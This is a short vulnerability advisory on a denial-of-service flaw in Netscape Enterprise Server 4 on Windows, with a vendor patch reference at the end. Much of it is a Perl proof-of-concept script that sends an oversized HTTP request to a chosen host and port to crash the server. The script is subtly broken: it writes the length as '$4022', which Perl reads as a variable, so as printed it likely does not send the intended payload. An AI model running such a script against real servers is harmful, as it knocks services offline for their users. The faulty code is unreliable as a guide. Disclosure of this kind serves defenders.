COMMAND

    Netscape Enterprise Server

SYSTEMS AFFECTED

    Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on Windows NT and Win2k

PROBLEM

    Following  is  based  on  a  Digizen  Security Group advisory.  By
    sending an invalid  method or URI  request of 4022  bytes Netscape
    Enterprise Server will stop responding to requests.

    The code:

    #!/usr/bin/perl
    use IO::Socket;
      if (@ARGV < 2)  {
         print "Usage: host port\n";
         exit;
       }
    $overflow = "A" x $4022;
    &connect;
    sleep(15);
    &connect;
    exit;
    ################################################
    sub connect() {
      $sock= IO::Socket::INET->new(Proto=>"TCP",
			         PeerAddr=>$ARGV[0],
			         PeerPort=>"$ARGV[1]",)
			         or die "Cant connect to $ARGV[0]: $!\n";
      $sock->autoflush(1);
      print $sock "$overflow /index.html HTTP/1.0\n\n";
      $response=<$sock>;
      print "$response";
      while(<$sock>){
         print "$_\n";
      }
      close $sock;
    }

SOLUTION

    To ensure the stability of our customer's environments iPlanet has
    made available an NSAPI patch  that can be applied to  iPlanet Web
    Server, Enterprise Edition version 4.1 Service Packs 3 through  7.
    The NSAPI patch is available at

        http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html

    This issue will  also be addressed  by the release  of iPlanet Web
    Server, Enterprise Edition version 4.1 Service Pack 8.